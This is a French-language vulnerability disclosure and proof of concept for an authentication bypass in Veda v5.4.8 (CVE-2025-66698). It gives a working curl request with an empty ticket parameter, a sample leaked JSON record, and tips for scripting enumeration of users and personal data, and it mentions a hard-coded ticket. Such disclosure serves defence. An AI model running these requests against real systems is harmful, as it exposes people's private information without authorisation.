
Preuve de concept pour CVE-2025-66698 : contournement d'authentification dans Veda v5.4.8 via un paramètre ticket vide, permettant l'énumération d'utilisateurs, de politiques et d'informations personnelles identifiables (PII) via des points de terminaison API non authentifiés.
Logiciel cible : Veda (Semantic Machines) v5.4.8 (probablement toutes les versions antérieures). Type de vulnérabilité : Contournement d'authentification. ID CVE : CVE-2025-66698. Résumé : Le système valide incorrectement le paramètre ticket, traitant une chaîne vide comme une session valide. Lien du projet : Veda (Semantic Machines)
18 novembre 2025 : Découverte et première demande de CVE. 9 janvier 2026 : ID CVE attribué. Tentative de contact avec l'éditeur (ignoré et supprimé). 13 janvier 2026 : Divulgation publique en raison de l'absence de réponse de l'éditeur.
Cette vulnérabilité a été découverte lors de mes recherches en sécurité en examinant le code. Le paramètre ticket dans le code ne vérifie pas la valeur vide.
Quelques points de terminaison d'API concernés :
Il existe de nombreux utilisateurs par défaut que vous pouvez énumérer, vous pouvez également changer le schéma : cfg en v-s, etc. pour énumérer les utilisateurs, les politiques, les PII (noms complets, photographies, titres, dates de naissance et coordonnées), etc.
curl "https://localhost/get_individual?ticket=&uri=cfg:VedaSystem" -k
{"@":"cfg:VedaSystem","rdf:type":[{"data":"v-s:Person","type":"Uri"}],"rdfs:isDefinedBy":[{"data":"http://semantic-machines.com/veda/system-account","type":"Uri"}],"rdfs:label":[{"data":"Система .","lang":"RU","type":"String"},{"data":"System .","lang":"EN","type":"String"}],"v-s:actualVersion":[{"data":"cfg:VedaSystem","type":"Uri"}],"v-s:author":[{"data":"cfg:VedaSystem","type":"Uri"}],"v-s:birthday":[{"data":"2014-03-04T20:00:00Z","type":"Datetime"}],"v-s:created":[{"data":"2025-11-18T14:49:45Z","type":"Datetime"}],"v-s:creator":[{"data":"cfg:VedaSystemAppointment","type":"Uri"}],"v-s:defaultAppointment":[{"data":"cfg:VedaSystemAppointment","type":"Uri"}],"v-s:edited":[{"data":"2025-11-18T17:08:59Z","type":"Datetime"}],"v-s:hasAccount":[{"data":"cfg:VedaSystemAccount","type":"Uri"}],"v-s:hasAppointment":[{"data":"cfg:VedaSystemAppointment","type":"Uri"}],"v-s:hasAspect":[{"data":"cfg:VedaSystem_aspect","type":"Uri"}],"v-s:hasImage":[{"data":"v-s:DefaultPhoto","type":"Uri"}],"v-s:lastEditor":[{"data":"cfg:VedaSystemAppointment","type":"Uri"}],"v-s:lastName":[{"data":"Система","lang":"RU","type":"String"},{"data":"System","lang":"EN","type":"String"}],"v-s:parentOrganization":[{"data":"cfg:org_Veda","type":"Uri"}],"v-s:updateCounter":[{"data":93,"type":"Integer"}],"v-ui:hasPreferences":[{"data":"cfg:VedaSystem_pref","type":"Uri"}]}
Tout ce que vous avez à faire est de trouver de plus en plus ces entités "xxx:xxx" (cfg:xxx, v-s:xxx, etc.). Vous pouvez écrire un simple script bash pour cela. Il existe également un systicket codé en dur pour obtenir le même résultat.
Évaluation CVSS :
AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N Score : 8.6 (Élevé)AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N Score : 9.3 (Critique)